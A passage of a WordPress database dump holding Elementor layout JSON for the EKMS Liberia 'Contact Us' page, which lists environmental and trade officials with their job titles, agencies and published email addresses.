href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24503,3616,'_elementor_edit_mode','builder'),(24504,3616,'_elementor_template_type','wp-page'),(24505,3616,'_elementor_version','3.0.16'),(24506,3616,'_wp_page_template','default'),(24507,3616,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br 